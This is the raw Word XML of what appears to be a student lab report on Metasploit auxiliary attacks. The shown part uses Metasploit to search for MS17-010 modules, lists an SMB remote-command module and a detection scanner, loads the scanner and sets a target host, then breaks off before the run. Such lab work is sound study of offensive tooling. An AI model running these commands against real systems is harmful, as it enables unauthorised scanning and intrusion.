            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 11:</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc20508511 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DBDDB30" w14:textId="40715042" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171" w:rsidP="00E857AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508512" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 12:</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc20508512 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="678E7B67" w14:textId="4111F8CA" w:rsidR="00334CCC" w:rsidRPr="00334CCC" w:rsidRDefault="00E26171" w:rsidP="00E857AB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc20508513" w:history="1">
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Task 13:</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc20508513 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00334CCC" w:rsidRPr="00334CCC">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32DD35E1" w14:textId="21FB7C2B" w:rsidR="00886482" w:rsidRPr="00834D24" w:rsidRDefault="00886482" w:rsidP="00886482">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00834D24">
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6B68CEE7" w14:textId="77777777" w:rsidR="00886482" w:rsidRPr="00834D24" w:rsidRDefault="00886482" w:rsidP="00886482">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED66FC7" w14:textId="77777777" w:rsidR="00886482" w:rsidRPr="00834D24" w:rsidRDefault="00886482" w:rsidP="00886482">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738AE282" w14:textId="7981CD97" w:rsidR="00834D24" w:rsidRPr="00A511F7" w:rsidRDefault="00733AF0" w:rsidP="00733AF0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc20508497"/>
      <w:r w:rsidRPr="00A511F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Part 1: Auxiliary Attacks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0BD5433F" w14:textId="77777777" w:rsidR="00733AF0" w:rsidRPr="00733AF0" w:rsidRDefault="00733AF0" w:rsidP="00733AF0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B91531" w14:textId="0F8188A1" w:rsidR="00733AF0" w:rsidRPr="00A511F7" w:rsidRDefault="00733AF0" w:rsidP="00733AF0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc20508498"/>
      <w:r w:rsidRPr="00A511F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 1:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00A511F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77633990" w14:textId="42123BBC" w:rsidR="00733AF0" w:rsidRDefault="00733AF0" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00733AF0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Explain the steps and commands you used to perform it. What does this attack do? Analyze the results you got from performing this attack. Also report the equivalent CVE of the attack you performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508A7642" w14:textId="6AE7AF72" w:rsidR="00733AF0" w:rsidRDefault="00733AF0" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B23F183" w14:textId="0CCE3ADC" w:rsidR="00733AF0" w:rsidRDefault="00733AF0" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>To find which critical vulnerabilities had an auxiliary attack the following command was used</w:t>
      </w:r>
      <w:r w:rsidR="00911154">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00A511F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B0F163" w14:textId="77777777" w:rsidR="00733AF0" w:rsidRDefault="00733AF0" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E6F8D7B" w14:textId="2D612473" w:rsidR="00733AF0" w:rsidRDefault="00733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93019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search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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auxiliary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:[Vulnerability Name]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274B87D5" w14:textId="77777777" w:rsidR="00733AF0" w:rsidRDefault="00733AF0" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6901BE50" w14:textId="0D9BC91A" w:rsidR="00733AF0" w:rsidRDefault="00911154" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>MS08-067 and MS09-001 gave no results from the search. MS17-010 returned the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C01D178" w14:textId="5CCDBACA" w:rsidR="00911154" w:rsidRDefault="00911154" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04F79E10"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search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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auxiliary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>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MS17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A77874F"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
    <w:p w14:paraId="468E9DB7"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Matching</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68456246"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D80DBE"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
    <w:p w14:paraId="23940499"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Name                              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Disclosure </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Date  Rank</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Check  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00811B81"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408E6FF"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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  auxiliary</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin</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ms17_010_command  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2017</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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>14</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normal  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>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EternalRomance</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EternalSynergy</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EternalChampion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Remote</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1492BB41"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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  auxiliary</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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smb_ms17_010                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">normal  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>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SMB RCE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33912548" w14:textId="5C2659F2" w:rsidR="00911154" w:rsidRPr="00911154" w:rsidRDefault="00911154" w:rsidP="0091115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B83D230" w14:textId="01DAB953" w:rsidR="00911154" w:rsidRDefault="00911154" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>To load one of the auxiliary attacks</w:t>
      </w:r>
      <w:r w:rsidR="00A511F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following command was used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5A7C4B" w14:textId="0C5F3512" w:rsidR="00911154" w:rsidRDefault="00911154" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="491D19BF" w14:textId="0F06CC5A" w:rsidR="00911154"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867671"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msf5 &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00911154">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidR="00911154">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary</w:t>
      </w:r>
      <w:r w:rsidR="00911154">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00911154">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scanner</w:t>
      </w:r>
      <w:r w:rsidR="00911154">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00911154">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00911154">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00911154">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>smb_ms17_010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B83B5A0" w14:textId="26752B2F" w:rsidR="00911154" w:rsidRDefault="00911154" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="780673A7" w14:textId="2F86D420" w:rsidR="00911154" w:rsidRDefault="00A511F7" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Now that we loaded an auxiliary attack, we set the target’s IP address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A6A5FD" w14:textId="523AC648" w:rsidR="00A511F7" w:rsidRDefault="00A511F7" w:rsidP="00733AF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288AFBF4"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361768"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msf5 auxiliary</w:t>
      </w:r>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smb_ms17_010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RHOSTS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76F08BEA"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361768"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOSTS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373BE8E5" w14:textId="05348CC4" w:rsidR="00A511F7" w:rsidRDefault="00A511F7" w:rsidP="00A511F7">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AE0D13" w14:textId="568CFFB9" w:rsidR="00A511F7" w:rsidRDefault="00A511F7" w:rsidP="00A511F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Finally, we run the auxiliary attack:</w:t>
      </w:r>
    </w:p>
